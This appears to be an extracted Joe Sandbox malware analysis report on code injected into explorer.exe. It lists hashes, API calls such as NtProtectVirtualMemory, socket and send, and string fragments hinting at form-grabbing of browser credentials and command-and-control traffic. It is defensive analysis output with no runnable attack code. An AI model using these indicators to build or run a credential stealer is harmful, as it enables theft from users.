                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: __fassign
                                                                                • String ID:
                                                                                • API String ID: 3965848254-0
                                                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                • Instruction ID: a209587c6f32b58790b749c95f26f687f849347c4e5ff0f73c8e343d0b7762c6
                                                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                • Instruction Fuzzy Hash: 7091A331D00209EFDF24DF59C8567AEB7B8EF55326F20847AD841A7292E7305A4DCB91
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: $$0
                                                                                • API String ID: 1302938615-389342756
                                                                                • Opcode ID: 2d2e4c77931c21892e8505deade4a7df631c5b2a8b6e15068200df365688448a
                                                                                • Instruction ID: 72493298067819e14af42f8751c7c1b80473ac2a3e967ce9bb616366d7fffa40
                                                                                • Opcode Fuzzy Hash: 2d2e4c77931c21892e8505deade4a7df631c5b2a8b6e15068200df365688448a
                                                                                • Instruction Fuzzy Hash: 4F91BF30D84A8AAFDF24DFA9C4453EEBBB5AF45310F16865BD4A1AB3D1C3744A41CB60

                                                                                Execution Graph

                                                                                Execution Coverage:2.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:6.3%
                                                                                Total number of Nodes:477
                                                                                Total number of Limit Nodes:19
                                                                                execution_graph: serialized node and edge data of the interactive execution graph (node id, code address, and the API called at that node; cut off at the end of the extracted page). APIs named on the graph nodes: NtCreateFile, NtProtectVirtualMemory, SleepEx, CreateThread, CreateMutexW, ObtainUserAgentString, WSAStartup, socket, getaddrinfo, connect, send, setsockopt, recv, closesocket.
8d5d8c2 13761->13767 13763 8d5e26b 13763->13757 13765 8d5f66d 13764->13765 13766 8d5f68b WSAStartup 13764->13766 13765->13766 13766->13759 13768 8d5d934 13767->13768 13769 8d5d9a6 13768->13769 13770 8d5d995 ObtainUserAgentString 13768->13770 13769->13763 13770->13769 13907 8d5842e 13908 8d5845b 13907->13908 13916 8d584c9 13907->13916 13909 8d62232 NtCreateFile 13908->13909 13908->13916 13910 8d58496 13909->13910 13911 8d584c5 13910->13911 13912 8d58082 NtCreateFile 13910->13912 13913 8d62232 NtCreateFile 13911->13913 13911->13916 13914 8d584b6 13912->13914 13913->13916 13914->13911 13915 8d57f52 NtCreateFile 13914->13915 13915->13911 14012 8d5f72e 14013 8d5f788 connect 14012->14013 14014 8d5f76a 14012->14014 14014->14013 13855 8d64aa9 13856 8d64aaf 13855->13856 13859 8d5f212 13856->13859 13858 8d64ac7 13860 8d5f237 13859->13860 13861 8d5f21b 13859->13861 13860->13858 13861->13860 13862 8d5f0c2 7 API calls 13861->13862 13862->13860 13917 8d5e22a 13918 8d5e25e 13917->13918 13919 8d5d8c2 ObtainUserAgentString 13918->13919 13920 8d5e26b 13919->13920

Control-flow Graph for 8d62f82 (rendered graph not reproduced; basic-block edge list and executed/not-executed markers omitted). API calls on the graph: getaddrinfo, setsockopt, recv; calls into helper functions 8d5f5b2, 8d5f732, 8d5f6b2, 8d5f7b2, 8d62942, 8d63d62, 8d64262 and others.
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
Similarity
• API ID: getaddrinforecvsetsockopt
• String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
• API String ID: 1564272048-1117930895
• Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction ID: 3b83bc0f829f12b14efdb6c396293d1bdda9ad67ae580c88500fc6156971bb0a
• Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction Fuzzy Hash: 3D529F30618A0C8BCB2DEF68D4847E9B7E1FB58351F50462EC49FC7246DE30A95ACB95

Control-flow Graph for 8d62232 (rendered graph not reproduced; basic-block edge list and executed/not-executed markers omitted). API call on the graph: NtCreateFile; calls into helper functions 8d62942, 8d62172, 8d63e92.
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
Similarity
• API ID: CreateFile
• String ID: `
• API String ID: 823142352-2679148245
• Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction ID: ffd15826fce258dd81dd64b7a2edcab8fadc215a0edfb94756cc9ff2afba34aa
• Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction Fuzzy Hash: DF223A70A18A0D9FCB59DF28C4956AEB7E1FB98352F40472ED45ED3250DB30E462CB85
APIs
• NtProtectVirtualMemory.NTDLL ref: 08D63E67
Memory Dump Source
• Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction ID: 9f07483a9646219df28ffc5f90f236c3a667bd079a7d7a78f7aae1647e3ba9c7
• Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction Fuzzy Hash: E001B134668B488F8B88EF6CE48012AB7E4FBDD355F000B3EE99AC3250EB70C5418752
APIs
• NtProtectVirtualMemory.NTDLL ref: 08D63E67
Memory Dump Source
• Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction ID: b350148c031cbd0965ec7c8f5856c9a5e3654ec88d0a0d3d9cafca7c162d2d1a
• Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction Fuzzy Hash: 7A01A234668B884B8B48EB2C94412A6B3E5FBCE315F000B3EE9DAC3251DB31D5028782

Control-flow Graph (rendered graph not reproduced)

APIs
• ObtainUserAgentString.URLMON ref: 08D5D9A0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction ID: 1e3bba0217b483a3866e562c2d176b1dd8e07d2d5bb2c9a7db6c12d520839542
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: F031D131614A1C8BCF04EFA8D8847EDB7E1FB58256F40422AD45ED7340DF748A55CBA9

Control-flow Graph (rendered graph not reproduced)

APIs
• ObtainUserAgentString.URLMON ref: 08D5D9A0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction ID: da0767e556ff2bea59911e166a9e37c0c770c8cfafa6e28e4d0da25f255a2749
• Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction Fuzzy Hash: 9721C130A14A1C8BCF05EFA8D8847EDBBA1FF59256F40432ED45AD7340DF748A158BA9

Control-flow Graph for 8d59b66 (rendered graph not reproduced; basic-block edge list and executed/not-executed markers omitted). API call on the graph: CreateMutexW; calls into helper functions 8d60612, 8d62942, 8d64da4, 8d64022, 8d643e2.

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction ID: da29b2a5afd748de22797bcec2dc21327c5cd1311c75b169ea087bed4a7471c3
• Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction Fuzzy Hash: 21415A74918A0CCFDF54EFA8D8947AD7BE1FBA8301F00426AC84ADB255DA309945CB95

Control-flow Graph (rendered graph not reproduced)

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction ID: ca809ffb548020287e306d912f6913435a3577ba0e620c225765652bbb3dc8db
• Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction Fuzzy Hash: C3415974918A0CCFDF84EFA8D498BED77E1FBA8301F04426AC84ADB255DE309945CB95

Control-flow Graph for 8d5f7ad (rendered graph not reproduced; basic-block edge list and executed/not-executed markers omitted). API call on the graph: closesocket; call into helper function 8d62942.

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
Similarity
• API ID: closesocket
• String ID: clos$esoc$ket
• API String ID: 2781271927-3604069445
• Opcode ID: ee1b70bfe413abe81f2a603d8ad3f3acd70c209794b79f5e1d4ca8ff919d78d6
• Instruction ID: 3790969cf1c1016c8e98c1a8ddb36723873718129e1bab3e435e4456ba4aa33b
• Opcode Fuzzy Hash: ee1b70bfe413abe81f2a603d8ad3f3acd70c209794b79f5e1d4ca8ff919d78d6
• Instruction Fuzzy Hash: 3CF08C74118B488BCB80EF18D48476ABBE0FB89355F54466DE88ECB255C77185528743

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 296 8d5f7b2-8d5f7e2 297 8d5f804-8d5f817 closesocket 296->297 298 8d5f7e4-8d5f7fe call 8d62942 296->298 298->297
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: closesocket
                                                                                • String ID: clos$esoc$ket
                                                                                • API String ID: 2781271927-3604069445

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: connect
                                                                                • String ID: conn$ect
                                                                                • API String ID: 1959786783-716201944

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: connect
                                                                                • String ID: conn$ect
                                                                                • API String ID: 1959786783-716201944

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: Startup
                                                                                • String ID: WSAS$tart
                                                                                • API String ID: 724789610-2426239465

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: Startup
                                                                                • String ID: WSAS$tart
                                                                                • API String ID: 724789610-2426239465

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: send
                                                                                • String ID: send
                                                                                • API String ID: 2809346765-2809346765

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: socket
                                                                                • String ID: sock
                                                                                • API String ID: 98920635-2415254727

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                • API String ID: 0-393284711
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                • API String ID: 0-2916316912
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                • API String ID: 0-1539916866
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                • API String ID: 0-355182820
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                • API String ID: 0-97273177
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                • API String ID: 0-639201278
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                • API String ID: 0-639201278
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                • API String ID: 0-2058692283
                                                                                • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                • Instruction ID: 459a1bc1956a0cb58dc975b4e1c7e18eee76607368720ef6ff41577f876135d7
                                                                                • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                • Instruction Fuzzy Hash: 54A19170618B488FDB19EFA8D444BEEB7E1FF98301F40462DE48AD7252EF7095458789
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                • API String ID: 0-2058692283
                                                                                • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                • Instruction ID: 1a69d7e91b7bb970a26eafa4c1674ba327b282ece7f0ffa3fc4aadf7dad17c99
                                                                                • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                • Instruction Fuzzy Hash: 75918070618B488FDB19EFA8D444BEEB7E1FF98301F40462DE48AD7252EF7095458789
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $.$e$n$v
                                                                                • API String ID: 0-1849617553
                                                                                • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                • Instruction ID: 970a2cb4bd24d1090958ff03d8a8b437e2af9a5e5488f2978048ecdc0a8f016f
                                                                                • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                • Instruction Fuzzy Hash: 3C715F35618B498FD758EFA8C4847AAB7F1FF58305F00063EE44AC7262EF7199468B85
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                • API String ID: 0-1970020201
                                                                                • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                • Instruction ID: e473fa5918b8a9f57aaf86accfb87f9393c10d751bf22cd726ffadf4ad7a95fd
                                                                                • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                • Instruction Fuzzy Hash: C6514FB0918B4C8FDB54EFA4C045AEEB7F1FF58301F40462EA89AE7254EF7095418B89
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4$\$dll$ion.$vers
                                                                                • API String ID: 0-1610437797
                                                                                • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                • Instruction ID: e2aca9ed82b8f63729793cb151a78234535be589fbbb9ee41545d06a0f96efa5
                                                                                • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                • Instruction Fuzzy Hash: 31414C74618F888BCBB5EF6498457EA77E5FF98302F41462EA88EC7340EF3095458786
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 32.d$cli.$dll$sspi$user
                                                                                • API String ID: 0-327345718
                                                                                • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                • Instruction ID: 7c56af85aed56fc2488e268962a54e01860a654993c9cb1d39bc84a788a216ea
                                                                                • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                • Instruction Fuzzy Hash: 95414B30A18E0D8FCB58EF6884946AE73E1FF78342F80416EA80AD7244DB71D581CB86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$el32$h$kern
                                                                                • API String ID: 0-4264704552
                                                                                • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                • Instruction ID: ac632229c2981aa6bddaca08ef2c823d7f81197d384ada9c8ce357dc6ea5df75
                                                                                • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                • Instruction Fuzzy Hash: 60418E70A08F4D8FD7A9DF2980843AAB7E1FF98302F104A2EA49EC3255DB70C545CB85
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $Snif$f fr$om:
                                                                                • API String ID: 0-3434893486
                                                                                • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                • Instruction ID: ebf9a9458d0f2906601f38844ec590d37dfb1f98cae12128632a138068e98c92
                                                                                • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                • Instruction Fuzzy Hash: 3B31CD7550CF886FD71AEB28C4846DABBD4FF94300F50492EE49A87252EF30A54ACA42
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $Snif$f fr$om:
                                                                                • API String ID: 0-3434893486
                                                                                • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                • Instruction ID: 2e7910ac7ec35fd1fdd688617345999e907e070a66015783db30ce9008a50a41
                                                                                • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                • Instruction Fuzzy Hash: 0131AD75508F486FD71AEB28C4846EAB7D4FF94301F50492EE49BD7352EF30A54ACA42
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$chro$hild$me_c
                                                                                • API String ID: 0-3136806129
                                                                                • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                • Instruction ID: 222fb973455ec30e8097123f43634c6d9a6d743fdf5ac5ee9eacbba5331ac8f3
                                                                                • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                • Instruction Fuzzy Hash: 2D313A74118E088FCB94EF688495BAAB7E1FF98202F84466DA44ECB355DF30C9458792
                                                                                Strings
                                                                                Memory Dump Source
